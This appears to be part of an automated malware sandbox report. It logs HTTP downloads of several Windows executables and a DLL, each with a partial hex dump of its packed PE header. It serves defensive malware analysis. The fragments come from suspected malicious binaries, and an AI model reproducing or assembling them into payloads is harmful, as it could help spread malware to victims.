Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 19:27:44 GMTContent-Type: application/octet-streamContent-Length: 3230720Last-Modified: Mon, 09 Dec 2024 19:02:34 GMTConnection: keep-aliveETag: "67573eca-314c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 50 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 31 00 00 04 00 00 6f 13 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 3d 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 3d 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 61 7a 68 6e 6e 76 6e 61 00 90 2a 00 00 b0 06 00 00 8e 2a 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6c 71 62 72 74 6c 65 00 10 00 00 00 40 31 00 00 06 00 00 00 24 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 31 00 00 22 00 00 00 2a 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 19:28:10 GMTContent-Type: application/octet-streamContent-Length: 1966080Last-Modified: Mon, 09 Dec 2024 17:50:43 GMTConnection: keep-aliveETag: "67572df3-1e0000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 50 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 86 00 00 04 00 00 68 c0 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 10 42 00 6e 00 00 00 00 e0 40 00 68 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 8e 85 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 21 01 00 00 e0 40 00 00 94 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 42 00 00 02 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 29 00 00 20 42 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6c 72 66 6e 68 6a 75 00 e0 1a 00 00 60 6b 00 00 de 1a 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 75 75 73 79 79 63 7a 00 10 00 00 00 40 86 00 00 04 00 00 00 da 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 86 00 00 22 00 00 00 de 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 19:28:18 GMTContent-Type: application/octet-streamContent-Length: 1838080Last-Modified: Mon, 09 Dec 2024 19:02:19 GMTConnection: keep-aliveETag: "67573ebb-1c0c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 c0 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 48 00 00 04 00 00 a8 43 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 79 6e 67 69 62 71 00 90 19 00 00 20 2f 00 00 8c 19 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 79 74 71 71 63 67 61 00 10 00 00 00 b0 48 00 00 04 00 00 00 e6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 48 00 00 22 00 00 00 ea 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 19:28:27 GMTContent-Type: application/octet-streamContent-Length: 1816064Last-Modified: Mon, 09 Dec 2024 19:02:26 GMTConnection: keep-aliveETag: "67573ec2-1bb600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 16 29 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 6f 6b 63 62 76 66 64 00 20 1a 00 00 80 4f 00 00 12 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6e 67 73 62 72 61 73 00 10 00 00 00 a0 69 00 00 04 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 94 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 19:28:36 GMTContent-Type: application/octet-streamContent-Length: 973312Last-Modified: Mon, 09 Dec 2024 19:00:32 GMTConnection: keep-aliveETag: "67573e50-eda00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 48 3e 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 2a 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 a1 29 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 f0 6f 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 6f 01 00 00 40 0d 00 00 70 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 64 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 19:28:43 GMTContent-Type: application/octet-streamContent-Length: 2771456Last-Modified: Mon, 09 Dec 2024 19:00:58 GMTConnection: keep-aliveETag: "67573e6a-2a4a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2b 00 00 04 00 00 13 29 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 6c 72 6f 69 71 77 71 00 00 2a 00 00 a0 00 00 00 ea 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 77 65 6c 78 66 72 6b 00 20 00 00 00 a0 2a 00 00 04 00 00 00 24 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2a 00 00 22 00 00 00 28 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 19:29:15 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
